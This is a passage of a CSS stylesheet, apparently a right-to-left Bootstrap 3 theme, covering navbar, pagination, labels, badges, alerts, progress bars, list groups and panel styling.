.navbar-inverse .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .active > a,
.navbar-inverse .navbar-nav > .active > a:hover,
.navbar-inverse .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: #080808;
}
.navbar-inverse .navbar-nav > .disabled > a,
.navbar-inverse .navbar-nav > .disabled > a:hover,
.navbar-inverse .navbar-nav > .disabled > a:focus {
  color: #444444;
  background-color: transparent;
}
.navbar-inverse .navbar-nav > .open > a,
.navbar-inverse .navbar-nav > .open > a:hover,
.navbar-inverse .navbar-nav > .open > a:focus {
  color: #ffffff;
  background-color: #080808;
}
@media (max-width: 990px) {
  .navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header {
    border-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu .divider {
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a {
    color: #999999;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: #080808;
  }
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #444444;
    background-color: transparent;
  }
}
.navbar-inverse .navbar-toggle {
  border-color: #333333;
}
.navbar-inverse .navbar-toggle:hover,
.navbar-inverse .navbar-toggle:focus {
  background-color: #333333;
}
.navbar-inverse .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-inverse .navbar-collapse,
.navbar-inverse .navbar-form {
  border-color: #101010;
}
.navbar-inverse .navbar-link {
  color: #999999;
}
.navbar-inverse .navbar-link:hover {
  color: #ffffff;
}
.navbar-inverse .btn-link {
  color: #999999;
}
.navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link:focus {
  color: #ffffff;
}
.navbar-inverse .btn-link[disabled]:hover,
fieldset[disabled] .navbar-inverse .btn-link:hover,
.navbar-inverse .btn-link[disabled]:focus,
fieldset[disabled] .navbar-inverse .btn-link:focus {
  color: #444444;
}
.breadcrumb {
  padding: 8px 15px;
  margin-bottom: 20px;
  list-style: none;
  background-color: #eeeeee;
  border-radius: 0;
}
.breadcrumb > li {
  display: inline-block;
}
.breadcrumb > li + li:before {
  padding: 0 5px;
  color: #999999;
  content: "/\00a0";
}
.breadcrumb > .active {
  color: #999999;
}
.pagination {
  display: inline-block;
  padding-right: 0;
  margin: 20px 0;
  border-radius: 0;
}
.pagination > li {
  display: inline;
}
.pagination > li > a,
.pagination > li > span {
  position: relative;
  float: right;
  padding: 6px 12px;
  margin-right: -1px;
  line-height: 1.42857143;
  color: #0077bb;
  text-decoration: none;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.pagination > li > a:hover,
.pagination > li > span:hover,
.pagination > li > a:focus,
.pagination > li > span:focus {
  z-index: 2;
  color: #00466e;
  background-color: #eeeeee;
  border-color: #dddddd;
}
.pagination > li:first-child > a,
.pagination > li:first-child > span {
  margin-right: 0;
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pagination > li:last-child > a,
.pagination > li:last-child > span {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pagination > .active > a,
.pagination > .active > span,
.pagination > .active > a:hover,
.pagination > .active > span:hover,
.pagination > .active > a:focus,
.pagination > .active > span:focus {
  z-index: 3;
  color: #ffffff;
  cursor: default;
  background-color: #0077bb;
  border-color: #0077bb;
}
.pagination > .disabled > span,
.pagination > .disabled > span:hover,
.pagination > .disabled > span:focus,
.pagination > .disabled > a,
.pagination > .disabled > a:hover,
.pagination > .disabled > a:focus {
  color: #999999;
  cursor: not-allowed;
  background-color: #ffffff;
  border-color: #dddddd;
}
.pagination-lg > li > a,
.pagination-lg > li > span {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
}
.pagination-lg > li:first-child > a,
.pagination-lg > li:first-child > span {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pagination-lg > li:last-child > a,
.pagination-lg > li:last-child > span {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pagination-sm > li > a,
.pagination-sm > li > span {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
}
.pagination-sm > li:first-child > a,
.pagination-sm > li:first-child > span {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.pagination-sm > li:last-child > a,
.pagination-sm > li:last-child > span {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.pager {
  padding-right: 0;
  margin: 20px 0;
  text-align: center;
  list-style: none;
}
.pager li {
  display: inline;
}
.pager li > a,
.pager li > span {
  display: inline-block;
  padding: 5px 14px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 15px;
}
.pager li > a:hover,
.pager li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.pager .next > a,
.pager .next > span {
  float: left;
}
.pager .previous > a,
.pager .previous > span {
  float: right;
}
.pager .disabled > a,
.pager .disabled > a:hover,
.pager .disabled > a:focus,
.pager .disabled > span {
  color: #999999;
  cursor: not-allowed;
  background-color: #ffffff;
}
.label {
  display: inline;
  padding: .2em .6em .3em;
  font-size: 75%;
  font-weight: 700;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: baseline;
  border-radius: .25em;
}
a.label:hover,
a.label:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.label:empty {
  display: none;
}
.btn .label {
  position: relative;
  top: -1px;
}
.label-default {
  background-color: #999999;
}
.label-default[href]:hover,
.label-default[href]:focus {
  background-color: #808080;
}
.label-primary {
  background-color: #0077bb;
}
.label-primary[href]:hover,
.label-primary[href]:focus {
  background-color: #005788;
}
.label-success {
  background-color: #3e9b52;
}
.label-success[href]:hover,
.label-success[href]:focus {
  background-color: #2f773f;
}
.label-info {
  background-color: #0099cc;
}
.label-info[href]:hover,
.label-info[href]:focus {
  background-color: #007399;
}
.label-warning {
  background-color: #ff8800;
}
.label-warning[href]:hover,
.label-warning[href]:focus {
  background-color: #cc6d00;
}
.label-danger {
  background-color: #cc0000;
}
.label-danger[href]:hover,
.label-danger[href]:focus {
  background-color: #990000;
}
.badge {
  display: inline-block;
  min-width: 10px;
  padding: 3px 7px;
  font-size: 12px;
  font-weight: bold;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: middle;
  background-color: #999999;
  border-radius: 0;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.btn-xs .badge,
.btn-group-xs > .btn .badge {
  top: 0;
  padding: 1px 5px;
}
a.badge:hover,
a.badge:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.list-group-item.active > .badge,
.nav-pills > .active > a > .badge {
  color: #0077bb;
  background-color: #ffffff;
}
.list-group-item > .badge {
  float: left;
}
.list-group-item > .badge + .badge {
  margin-left: 5px;
}
.nav-pills > li > a > .badge {
  margin-right: 3px;
}
.jumbotron {
  padding-top: 40px;
  padding-bottom: 40px;
  margin-bottom: 40px;
  color: inherit;
  background-color: #eeeeee;
}
.jumbotron h1,
.jumbotron .h1 {
  color: inherit;
}
.jumbotron p {
  margin-bottom: 20px;
  font-size: 21px;
  font-weight: 200;
}
.jumbotron > hr {
  border-top-color: #d5d5d5;
}
.container .jumbotron,
.container-fluid .jumbotron {
  padding-left: 20px;
  padding-right: 20px;
  border-radius: 0;
}
.jumbotron .container {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .jumbotron {
    padding-top: 64px;
    padding-bottom: 64px;
  }
  .container .jumbotron,
  .container-fluid .jumbotron {
    padding-left: 80px;
    padding-right: 80px;
  }
  .jumbotron h1,
  .jumbotron .h1 {
    font-size: 63px;
  }
}
.thumbnail {
  display: block;
  padding: 4px;
  margin-bottom: 20px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
  -webkit-transition: border 0.2s ease-in-out;
  -o-transition: border 0.2s ease-in-out;
  transition: border 0.2s ease-in-out;
}
.thumbnail > img,
.thumbnail a > img {
  margin-left: auto;
  margin-right: auto;
}
a.thumbnail:hover,
a.thumbnail:focus,
a.thumbnail.active {
  border-color: #0077bb;
}
.thumbnail .caption {
  padding: 10px;
  color: #444444;
}
.alert {
  padding: 15px;
  margin-bottom: 20px;
  border: 1px solid transparent;
  border-radius: 0;
}
.alert h4 {
  margin-top: 0;
  color: inherit;
}
.alert .alert-link {
  font-weight: bold;
}
.alert > p,
.alert > ul {
  margin-bottom: 0;
}
.alert > p + p {
  margin-top: 5px;
}
.alert-dismissable,
.alert-dismissible {
  padding-left: 35px;
}
.alert-dismissable .close,
.alert-dismissible .close {
  position: relative;
  top: -2px;
  left: -21px;
  color: inherit;
}
.alert-success {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.alert-success hr {
  border-top-color: #c9e2b3;
}
.alert-success .alert-link {
  color: #356635;
}
.alert-info {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.alert-info hr {
  border-top-color: #a6e1ec;
}
.alert-info .alert-link {
  color: #2d6987;
}
.alert-warning {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.alert-warning hr {
  border-top-color: #f7e1b5;
}
.alert-warning .alert-link {
  color: #a47e3c;
}
.alert-danger {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.alert-danger hr {
  border-top-color: #e4b9c0;
}
.alert-danger .alert-link {
  color: #953b39;
}
@-webkit-keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 100% 0;
  }
}
@keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 100% 0;
  }
}
.progress {
  height: 20px;
  margin-bottom: 20px;
  overflow: hidden;
  background-color: #f5f5f5;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
  box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
}
.progress-bar {
  float: right;
  width: 0%;
  height: 100%;
  font-size: 12px;
  line-height: 20px;
  color: #ffffff;
  text-align: center;
  background-color: #0077bb;
  -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  -webkit-transition: width 0.6s ease;
  -o-transition: width 0.6s ease;
  transition: width 0.6s ease;
}
.progress-striped .progress-bar,
.progress-bar-striped {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-size: 40px 40px;
}
.progress.active .progress-bar,
.progress-bar.active {
  -webkit-animation: progress-bar-stripes 2s linear infinite;
  -o-animation: progress-bar-stripes 2s linear infinite;
  animation: progress-bar-stripes 2s linear infinite;
}
.progress-bar-success {
  background-color: #3e9b52;
}
.progress-striped .progress-bar-success {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-info {
  background-color: #0099cc;
}
.progress-striped .progress-bar-info {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-warning {
  background-color: #ff8800;
}
.progress-striped .progress-bar-warning {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-danger {
  background-color: #cc0000;
}
.progress-striped .progress-bar-danger {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.media {
  margin-top: 15px;
}
.media:first-child {
  margin-top: 0;
}
.media,
.media-body {
  overflow: hidden;
  zoom: 1;
}
.media-body {
  width: 10000px;
}
.media-object {
  display: block;
}
.media-object.img-thumbnail {
  max-width: none;
}
.media-right,
.media > .pull-right {
  padding-right: 10px;
}
.media-left,
.media > .pull-left {
  padding-left: 10px;
}
.media-left,
.media-right,
.media-body {
  display: table-cell;
  vertical-align: top;
}
.media-middle {
  vertical-align: middle;
}
.media-bottom {
  vertical-align: bottom;
}
.media-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.media-list {
  padding-right: 0;
  list-style: none;
}
.list-group {
  padding-right: 0;
  margin-bottom: 20px;
}
.list-group-item {
  position: relative;
  display: block;
  padding: 10px 15px;
  margin-bottom: -1px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.list-group-item:first-child {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.list-group-item:last-child {
  margin-bottom: 0;
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.list-group-item.disabled,
.list-group-item.disabled:hover,
.list-group-item.disabled:focus {
  color: #999999;
  cursor: not-allowed;
  background-color: #eeeeee;
}
.list-group-item.disabled .list-group-item-heading,
.list-group-item.disabled:hover .list-group-item-heading,
.list-group-item.disabled:focus .list-group-item-heading {
  color: inherit;
}
.list-group-item.disabled .list-group-item-text,
.list-group-item.disabled:hover .list-group-item-text,
.list-group-item.disabled:focus .list-group-item-text {
  color: #999999;
}
.list-group-item.active,
.list-group-item.active:hover,
.list-group-item.active:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #0077bb;
  border-color: #0077bb;
}
.list-group-item.active .list-group-item-heading,
.list-group-item.active:hover .list-group-item-heading,
.list-group-item.active:focus .list-group-item-heading,
.list-group-item.active .list-group-item-heading > small,
.list-group-item.active:hover .list-group-item-heading > small,
.list-group-item.active:focus .list-group-item-heading > small,
.list-group-item.active .list-group-item-heading > .small,
.list-group-item.active:hover .list-group-item-heading > .small,
.list-group-item.active:focus .list-group-item-heading > .small {
  color: inherit;
}
.list-group-item.active .list-group-item-text,
.list-group-item.active:hover .list-group-item-text,
.list-group-item.active:focus .list-group-item-text {
  color: #88d4ff;
}
a.list-group-item,
button.list-group-item {
  color: #555555;
}
a.list-group-item .list-group-item-heading,
button.list-group-item .list-group-item-heading {
  color: #333333;
}
a.list-group-item:hover,
button.list-group-item:hover,
a.list-group-item:focus,
button.list-group-item:focus {
  color: #555555;
  text-decoration: none;
  background-color: #f5f5f5;
}
button.list-group-item {
  width: 100%;
  text-align: right;
}
.list-group-item-success {
  color: #468847;
  background-color: #dff0d8;
}
a.list-group-item-success,
button.list-group-item-success {
  color: #468847;
}
a.list-group-item-success .list-group-item-heading,
button.list-group-item-success .list-group-item-heading {
  color: inherit;
}
a.list-group-item-success:hover,
button.list-group-item-success:hover,
a.list-group-item-success:focus,
button.list-group-item-success:focus {
  color: #468847;
  background-color: #d0e9c6;
}
a.list-group-item-success.active,
button.list-group-item-success.active,
a.list-group-item-success.active:hover,
button.list-group-item-success.active:hover,
a.list-group-item-success.active:focus,
button.list-group-item-success.active:focus {
  color: #fff;
  background-color: #468847;
  border-color: #468847;
}
.list-group-item-info {
  color: #3a87ad;
  background-color: #d9edf7;
}
a.list-group-item-info,
button.list-group-item-info {
  color: #3a87ad;
}
a.list-group-item-info .list-group-item-heading,
button.list-group-item-info .list-group-item-heading {
  color: inherit;
}
a.list-group-item-info:hover,
button.list-group-item-info:hover,
a.list-group-item-info:focus,
button.list-group-item-info:focus {
  color: #3a87ad;
  background-color: #c4e3f3;
}
a.list-group-item-info.active,
button.list-group-item-info.active,
a.list-group-item-info.active:hover,
button.list-group-item-info.active:hover,
a.list-group-item-info.active:focus,
button.list-group-item-info.active:focus {
  color: #fff;
  background-color: #3a87ad;
  border-color: #3a87ad;
}
.list-group-item-warning {
  color: #c09853;
  background-color: #fcf8e3;
}
a.list-group-item-warning,
button.list-group-item-warning {
  color: #c09853;
}
a.list-group-item-warning .list-group-item-heading,
button.list-group-item-warning .list-group-item-heading {
  color: inherit;
}
a.list-group-item-warning:hover,
button.list-group-item-warning:hover,
a.list-group-item-warning:focus,
button.list-group-item-warning:focus {
  color: #c09853;
  background-color: #faf2cc;
}
a.list-group-item-warning.active,
button.list-group-item-warning.active,
a.list-group-item-warning.active:hover,
button.list-group-item-warning.active:hover,
a.list-group-item-warning.active:focus,
button.list-group-item-warning.active:focus {
  color: #fff;
  background-color: #c09853;
  border-color: #c09853;
}
.list-group-item-danger {
  color: #b94a48;
  background-color: #f2dede;
}
a.list-group-item-danger,
button.list-group-item-danger {
  color: #b94a48;
}
a.list-group-item-danger .list-group-item-heading,
button.list-group-item-danger .list-group-item-heading {
  color: inherit;
}
a.list-group-item-danger:hover,
button.list-group-item-danger:hover,
a.list-group-item-danger:focus,
button.list-group-item-danger:focus {
  color: #b94a48;
  background-color: #ebcccc;
}
a.list-group-item-danger.active,
button.list-group-item-danger.active,
a.list-group-item-danger.active:hover,
button.list-group-item-danger.active:hover,
a.list-group-item-danger.active:focus,
button.list-group-item-danger.active:focus {
  color: #fff;
  background-color: #b94a48;
  border-color: #b94a48;
}
.list-group-item-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.list-group-item-text {
  margin-bottom: 0;
  line-height: 1.3;
}
.panel {
  margin-bottom: 20px;
  background-color: #ffffff;
  border: 1px solid transparent;
  border-radius: 0;
  -webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
}
.panel-body {
  padding: 15px;
}
.panel-heading {
  padding: 10px 15px;
  border-bottom: 1px solid transparent;
  border-top-right-radius: -1;
  border-top-left-radius: -1;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title {
  margin-top: 0;
  margin-bottom: 0;
  font-size: 16px;
  color: inherit;
}
.panel-title > a,
.panel-title > small,
.panel-title > .small,
.panel-title > small > a,
.panel-title > .small > a {
  color: inherit;
}
.panel-footer {
  padding: 10px 15px;
  background-color: #f5f5f5;
  border-top: 1px solid #dddddd;
  border-bottom-left-radius: -1;
  border-bottom-right-radius: -1;
}
.panel > .list-group,
.panel > .panel-collapse > .list-group {
  margin-bottom: 0;
}
.panel > .list-group .list-group-item,
.panel > .panel-collapse > .list-group .list-group-item {
  border-width: 1px 0;
  border-radius: 0;
}
.panel > .list-group:first-child .list-group-item:first-child,
.panel > .panel-collapse > .list-group:first-child .list-group-item:first-child {
  border-top: 0;
  border-top-right-radius: -1;
  border-top-left-radius: -1;
}
.panel > .list-group:last-child .list-group-item:last-child,
.panel > .panel-collapse > .list-group:last-child .list-group-item:last-child {
  border-bottom: 0;
  border-bottom-left-radius: -1;
  border-bottom-right-radius: -1;
}
.panel > .panel-heading + .panel-collapse > .list-group .list-group-item:first-child {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.panel-heading + .list-group .list-group-item:first-child {
  border-top-width: 0;
}
.list-group + .panel-footer {
  border-top-width: 0;
}
.panel > .table,
.panel > .table-responsive > .table,
.panel > .panel-collapse > .table {
  margin-bottom: 0;
}
.panel > .table caption,
.panel > .table-responsive > .table caption,
.panel > .panel-collapse > .table caption {
  padding-left: 15px;
  padding-right: 15px;
}
.panel > .table:first-child,
.panel > .table-responsive:first-child > .table:first-child {
  border-top-right-radius: -1;
  border-top-left-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child {
  border-top-right-radius: -1;
  border-top-left-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:first-child {
  border-top-right-radius: -1;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:last-child {
  border-top-left-radius: -1;
}
.panel > .table:last-child,
.panel > .table-responsive:last-child > .table:last-child {
  border-bottom-left-radius: -1;
  border-bottom-right-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child {
  border-bottom-left-radius: -1;
  border-bottom-right-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:first-child {
  border-bottom-right-radius: -1;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:last-child {
  border-bottom-left-radius: -1;
}
.panel > .panel-body + .table,
.panel > .panel-body + .table-responsive,
.panel > .table + .panel-body,
.panel > .table-responsive + .panel-body {
  border-top: 1px solid #dddddd;
}
.panel > .table > tbody:first-child > tr:first-child th,
.panel > .table > tbody:first-child > tr:first-child td {
  border-top: 0;
}
.panel > .table-bordered,
.panel > .table-responsive > .table-bordered {
  border: 0;
}
.panel > .table-bordered > thead > tr > th:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:first-child,
.panel > .table-bordered > tbody > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:first-child,
.panel > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-bordered > thead > tr > td:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:first-child,
.panel > .table-bordered > tbody > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:first-child,
.panel > .table-bordered > tfoot > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:first-child {
  border-right: 0;
}
.panel > .table-bordered > thead > tr > th:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:last-child,
.panel > .table-bordered > tbody > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:last-child,
.panel > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-bordered > thead > tr > td:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:last-child,
.panel > .table-bordered > tbody > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:last-child,
.panel > .table-bordered > tfoot > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:last-child {
  border-left: 0;
}
.panel > .table-bordered > thead > tr:first-child > td,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > td,
.panel > .table-bordered > tbody > tr:first-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > td,
.panel > .table-bordered > thead > tr:first-child > th,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > th,
.panel > .table-bordered > tbody > tr:first-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > th {
  border-bottom: 0;
}
.panel > .table-bordered > tbody > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > td,
.panel > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-bordered > tbody > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > th,
.panel > .table-bordered > tfoot > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > th {
  border-bottom: 0;
}
.panel > .table-responsive {
  margin-bottom: 0;
  border: 0;
}
.panel-group {
  margin-bottom: 20px;
}
.panel-group .panel {
  margin-bottom: 0;
  border-radius: 0;
}
.panel-group .panel + .panel {
  margin-top: 5px;
}
.panel-group .panel-heading {
  border-bottom: 0;
}
.panel-group .panel-heading + .panel-collapse > .panel-body,
.panel-group .panel-heading + .panel-collapse > .list-group {
  border-top: 1px solid #dddddd;
}
.panel-group .panel-footer {
  border-top: 0;
}
.panel-group .panel-footer + .panel-collapse .panel-body {
  border-bottom: 1px solid #dddddd;
}
.panel-default {
  border-color: #dddddd;
}
.panel-default > .panel-heading {
  color: #444444;
  background-color: #f5f5f5;
  border-color: #dddddd;
}
.panel-default > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #dddddd;
}
.panel-default > .panel-heading .badge {
  color: #f5f5f5;
  background-color: #444444;
}
.panel-default > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #dddddd;
}
.panel-primary {
  border-color: #0077bb;
}
.panel-primary > .panel-heading {
  color: #ffffff;
  background-color: #0077bb;
  border-color: #0077bb;
}
.panel-primary > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #0077bb;
}
.panel-primary > .panel-heading .badge {
  color: #0077bb;
  background-color: #ffffff;
}
.panel-primary > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #0077bb;
}
.panel-success {
  border-color: #d6e9c6;
}
.panel-success > .panel-heading {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.panel-success > .panel-heading + .panel-collapse > .panel-body {
